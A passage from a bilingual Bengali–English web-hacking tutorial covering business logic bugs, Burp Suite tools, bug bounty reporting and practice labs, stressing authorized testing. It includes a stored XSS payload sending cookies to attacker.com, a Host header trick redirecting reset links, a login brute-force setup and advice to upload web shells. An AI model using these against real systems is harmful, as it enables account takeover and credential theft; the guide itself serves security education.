File upload vulnerability পেলে web shell upload করো, তারপর path traversal দিয়ে shell-এর সঠিক path বের করো। এটা Critical severity। If you find file upload vulnerability, upload a web shell, then use path traversal to find the shell's correct path. This is Critical severity.

📌 Chapter সারসংক্ষেপChapter Summary

  • 📤 File Upload = PHP shell → RCE (Critical)
  • 🔀 Bypass: double extension, case variation, null byte
  • 🗂️ Path Traversal = ../ দিয়ে sensitive file পড়াPath Traversal = reading sensitive files with ../
  • 🔒 Fix: whitelist only, rename file, outside webroot-এ store
CHAPTER 10
🧩 Business Logic Bugs
Scanner ধরতে পারে না এমন বাগ — Manual testing-এর আসল শক্তিBugs scanners can't find — the true power of manual testing

🤔 Business Logic Bug কী?What is a Business Logic Bug?

এই ধরনের বাগ application-এর নিজস্ব business rule ভঙ্গ করে। কোনো injection বা technical exploit নেই — শুধু logic-এর দুর্বলতা। এগুলো automated scanner ধরতে পারে না — তাই manual testing দরকার।These bugs violate the application's own business rules. No injection or technical exploit — just logic flaws. Automated scanners can't find them — manual testing is needed.

💸 Price Manipulation

# কেনার সময় Burp-এ request intercept করো # POST /checkout # {"item_id": 123, "quantity": 1, "price": 99.99} # ↑↑↑↑↑ # price বদলে দাও: # {"item_id": 123, "quantity": 1, "price": 0.01} # বা negative price: # {"item_id": 123, "quantity": 1, "price": -99.99} # Quantity manipulation # {"quantity": -1} → refund without purchase?

🏃 Race Condition

একই সময়ে একাধিক request পাঠালে server ঠিকমতো handle করতে না পারলে double benefit পাওয়া যায়।Sending multiple requests at the same time can result in double benefits if the server can't handle it properly.

# Burp Repeater-এ একই request ১০-২০টা পাঠাও simultaneously # উদাহরণ: একটা coupon একাধিকবার ব্যবহার # উদাহরণ: একটা gift card একাধিকবার redeem # উদাহরণ: একটা free trial একাধিকবার activate # Burp Turbo Intruder দিয়ে race condition test # All requests simultaneously send করো

🔄 Password Reset Logic FlawsPassword Reset Logic Flaws

# Reset token predictable? # Email 1-এর token: abc123_1705312200 # Email 2-এর token: xyz456_1705312201 # ^^^^^^^^^^ # Unix timestamp! Predictable! # Token reuse # Reset করার পরেও পুরনো token কাজ করে? # Host header injection in reset link # POST /forgot-password # Host: attacker.com ← বদলে দাও # Reset link attacker.com-এ যাবে!
🎯 Business Logic বাগ খোঁজার টিপসTips for Finding Business Logic Bugs
  • সব parameter modify করে দেখোTry modifying every parameter
  • Negative number, zero, অনেক বড় সংখ্যা দাওTry negative numbers, zero, very large numbers
  • Steps skip করা যায়? Step 1 → Step 3?Can you skip steps? Step 1 → Step 3?
  • অন্য user-এর token নিজের account-এ use হয়?Can another user's token be used on your account?
  • Free plan-এ paid feature access হয়?Can free plan access paid features?

📌 Chapter সারসংক্ষেপChapter Summary

  • 🧩 Business Logic = logic flaw, scanner ধরতে পারে নাBusiness Logic = logic flaw, scanners can't find
  • 💸 Price manipulation = parameter modify করোPrice manipulation = modify parameters
  • 🏃 Race Condition = simultaneous request
  • 🔑 Reset Token = predictable? reusable?
CHAPTER 11
🦆 Burp Suite — Deep Dive
Proxy, Repeater, Intruder, Decoder, Comparer — হাতে-কলমে শেখাProxy, Repeater, Intruder, Decoder, Comparer — hands-on learning

🔄 Proxy — Request দেখা ও পরিবর্তনViewing & Modifying Requests

# Proxy tab-এ যাও → Intercept: ON # Browser-এ request করো # Burp-এ request আটকাবে # এখন তুমি পারবে: # - Parameter বদলানো # - Header যোগ/বাদ দেওয়া # - Body modify করা # - Request drop করা # - Forward করা # HTTP History → সব past request দেখো # Right click → "Send to Repeater" / "Send to Intruder"

🔁 Repeater — বারবার request পাঠানোSending Requests Repeatedly

# Repeater-এ request পাঠাও → Send বাটন চাপো # Response দেখো → Parameter বদলাও → আবার Send # কখন ব্যবহার করবো: # - SQLi payload manually test করতে # - IDOR test করতে (id=1, id=2, id=3...) # - XSS payload vary করতে # - Authentication bypass test করতে # Shortcut: Ctrl+R → Repeater-এ পাঠাও # Shortcut: Ctrl+Space → Request পাঠাও

🎯 Intruder — Automated AttackAutomated Attack

# Attack Types: # Sniper → একটা position, একটা wordlist # Battering Ram → সব position, একই payload # Pitchfork → N position, N wordlist (parallel) # Cluster Bomb → সব combination (brute force) # Example: Login Brute Force # POST /login # username=admin&password=§PASS§ # ^----^ # Payload → Simple list → rockyou.txt # Start Attack → Response length/status দেখো # আলাদা response = সঠিক password!

🔓 Decoder — Encode/Decode করাEncoding/Decoding

# Decoder tab → text paste করো # Decode করতে: Input: YWRtaW46cGFzczEyMzQ= Output: admin:pass1234 (Base64 decode) # Encode করতে: Input: <script>alert(1)</script> Output: %3Cscript%3Ealert%281%29%3C%2Fscript%3E (URL encode) # Supported formats: # URL, HTML, Base64, Hex, ASCII, Gzip

📊 Comparer — দুটো Response তুলনাComparing Two Responses

# দুটো response compare করো: # Valid user vs invalid user response # Admin vs normal user response # সঠিক password vs ভুল password response # User enumeration example: # username=admin → "Invalid password" (user exists!) # username=xyz → "User not found" (different!) # → User enumeration vulnerability!
⌨️ Burp Suite দরকারি ShortcutUseful Burp Suite Shortcuts
ShortcutকাজAction
Ctrl+IIntruder-এ পাঠাওSend to Intruder
Ctrl+RRepeater-এ পাঠাওSend to Repeater
Ctrl+UURL decode করোURL decode
Ctrl+Shift+UURL encode করোURL encode
Ctrl+FResponse-এ খোঁজোSearch in response

📌 Chapter সারসংক্ষেপChapter Summary

  • 🔄 Proxy = request intercept ও modifyProxy = intercept and modify requests
  • 🔁 Repeater = manually test করো বারবারRepeater = manually test repeatedly
  • 🎯 Intruder = automated attack (brute force, fuzzing)
  • 🔓 Decoder = Base64, URL, HTML encode/decode
  • 📊 Comparer = দুটো response-এর পার্থক্য খোঁজোComparer = find differences between responses
CHAPTER 12
💰 Bug Bounty — শুরু থেকে Report পর্যন্তBug Bounty — From Start to Report
Platform বেছে নেওয়া, Scope বোঝা, Bug খোঁজা এবং Professional Report লেখাChoosing a platform, understanding scope, finding bugs, and writing a professional report

🚀 Bug Bounty শুরু করার ধাপSteps to Start Bug Bounty

1
Platform-এ Account খোলোCreate Account on Platform

HackerOne দিয়ে শুরু করো — সবচেয়ে বড় ও beginner-friendly। Profile সুন্দর করে সাজাও।Start with HackerOne — the biggest and most beginner-friendly. Build a nice profile.

2
Program বেছে নাওChoose a Program

নতুন হলে broad scope এবং high response rate দেখো। Scope ভালো করে পড়ো।As a beginner look for broad scope and high response rate. Read the scope carefully.

3
Scope বোঝোUnderstand the Scope

In-scope: কোন subdomain, কোন vulnerability। Out-of-scope: কোন domain test করা নিষেধ। Scope ভায়োলেশন করলে ban হবে!In-scope: which subdomains, which vulnerabilities. Out-of-scope: which domains are prohibited. Scope violation = ban!

4
Test করো ও Report লেখোTest and Write Report

বাগ পেলে সাথে সাথে professional report লেখো। ভালো report = বেশি bounty।When you find a bug, write a professional report immediately. Better report = more bounty.

📝 Professional Bug Report কিভাবে লিখবো?How to Write a Professional Bug Report?

📋 Report Template

HIGH
## Vulnerability Title Stored XSS in Profile Bio Field Leads to Account Takeover ## Severity High (CVSS: 8.2) ## Summary The profile bio field does not sanitize HTML/JS input, allowing stored XSS. An attacker can steal session cookies of any user who views the malicious profile. ## Steps to Reproduce 1. Login to https://target.com 2. Go to Profile → Edit → Bio field 3. Enter: <script>document.location='https://attacker.com/steal?c='+document.cookie</script> 4. Save profile 5. Ask victim to view your profile 6. Victim's cookie appears at attacker.com ## Impact An attacker can steal session tokens of any user, leading to complete account takeover without user interaction beyond viewing a profile page. ## Proof of Concept [Screenshot / Video attached] Cookie received: session=abc123xyz_victim_token ## Suggested Fix - Sanitize all HTML output using DOMPurify or similar - Implement Content-Security-Policy header - Add HttpOnly flag to session cookie

📊 CVSS — Severity কিভাবে নির্ধারিত হয়How Severity is Determined

Factorপ্রশ্নQuestionScore প্রভাবScore Impact
Attack VectorNetwork দিয়ে আক্রমণ সম্ভব?Attack possible over network?Network = বেশিNetwork = higher
Attack Complexityকত সহজ?How easy?Low = বেশিLow = higher
Privileges RequiredLogin লাগে?Login needed?None = বেশিNone = higher
Confidentiality ImpactData leak হয়?Data leaked?High = বেশিHigh = higher
Availability ImpactService down হয়?Service goes down?High = বেশিHigh = higher

📌 Chapter সারসংক্ষেপChapter Summary

  • 🚀 HackerOne → Program → Scope পড়ো → Test → Report
  • 📝 Good report: Title, Severity, Steps, Impact, PoC, Fix
  • 📊 CVSS — 0-10 scale-এ severity নির্ধারণdetermines severity on 0-10 scale
  • ⚖️ Scope ভায়োলেশন করো না — ban হবে!Don't violate scope — you'll get banned!
CHAPTER 13
🎯 Practice Lab ও RoadmapPractice Labs & Roadmap
কোথায় এবং কিভাবে প্র্যাকটিস করবো — কোনো আইনি ঝুঁকি ছাড়াWhere and how to practice — without any legal risk

🏋️ Practice করার জায়গাPlaces to Practice

Platformকী শেখায়What it teachesকঠিনতাLevelURL
PortSwigger Web Academyসব web vuln — বিস্তারিতAll web vulns — detailedBeginner → Advancedportswigger.net/web-security
TryHackMeGuided learning, CTFGuided learning, CTFBeginner friendlytryhackme.com
HackTheBoxCTF, Machines, ChallengesIntermediatehackthebox.com
DVWALocal lab, সব vulnerabilityLocal lab, all vulnerabilitiesBeginnerlocalhost-এ installinstall on localhost
OWASP Juice ShopModern web app hackingModern web app hackingAll levelsowasp.org/www-project-juice-shop
PentesterLabWeb pentesting certificatesIntermediatepentesterlab.com

📅 ৬ মাসের Roadmap — Zero থেকে First Bug6 Month Roadmap — Zero to First Bug

১-২
🌱 মাস ১-২: FoundationMonth 1-2: Foundation

HTTP, Burp Suite setup, HTML/JS basics, Linux terminal basics

এই গাইড পড়ো Burp Suite সেটআপ TryHackMe: Web Fundamentals PortSwigger: SQL Injection labs
৩-৪
মাস ৩-৪: Vulnerability PracticeMonth 3-4: Vulnerability Practice

OWASP Top 10 সব পড়ো ও practice করোStudy and practice all OWASP Top 10

PortSwigger XSS labs DVWA সব module Juice Shop challenges TryHackMe OWASP room
৫-৬
🏆 মাস ৫-৬: Real TargetsMonth 5-6: Real Targets

HackerOne-এ প্রথম Bug Bounty program-এ কাজ শুরু করোStart working on your first Bug Bounty program on HackerOne

HackerOne signup Public programs-এ test Report লেখা practice Community Discord-এ যোগ

📚 দরকারি ResourcesEssential Resources

📖 পড়ার বই ও গাইডBooks & Guides to Read

  • The Web Application Hacker's Handbook
  • Bug Bounty Bootcamp — Vickie Li
  • OWASP Testing Guide (free)
  • HackTricks — book.hacktricks.xyz
  • PayloadsAllTheThings — GitHub

🎥 YouTube ChannelYouTube Channels

  • 🔴 Nahamsec
  • 🔵 STÖK
  • 🟢 InsiderPhD
  • 🟡 LiveOverflow
  • 🟠 The Cyber Mentor

🏅 OWASP Top 10 — Quick ReferenceOWASP Top 10 — Quick Reference

#Vulnerabilityআমরা কোথায় শিখেছিWhere we learned it
A01Broken Access ControlCh. 7 — IDOR
A02Cryptographic FailuresCh. 2 — HTTPS
A03Injection (SQLi, XSS)Ch. 5, 6
A04Insecure DesignCh. 10 — Business Logic
A05Security MisconfigurationCh. 2, 4
A06Vulnerable ComponentsCh. 4 — Recon
A07Auth & Session FailuresCh. 7 — Auth
A08Software Integrity FailuresAdvanced topic
A09Security Logging FailuresBlue team topic
A10SSRFCh. 8 — SSRF
⚠️ সবসময় মনে রেখোAlways Remember
  • শুধু authorized target-এ কাজ করোOnly work on authorized targets
  • বাগ পেলে exploit করো না — রিপোর্ট করোIf you find a bug, don't exploit it — report it
  • User data নষ্ট করো নাDon't destroy user data
  • Hacking skill-এর সাথে নৈতিকতাও শেখোLearn ethics alongside hacking skills

🎓 তুমি এখন জানোYou Now Know

  • 🌐 HTTP কিভাবে কাজ করেHow HTTP works
  • 💉 SQLi, XSS, IDOR, CSRF, SSRF, File Upload, Path Traversal
  • 🦆 Burp Suite দিয়ে test করাTesting with Burp Suite
  • 💰 Bug Bounty Report লেখাWriting Bug Bounty reports
  • 🎯 কোথায় practice করবোWhere to practice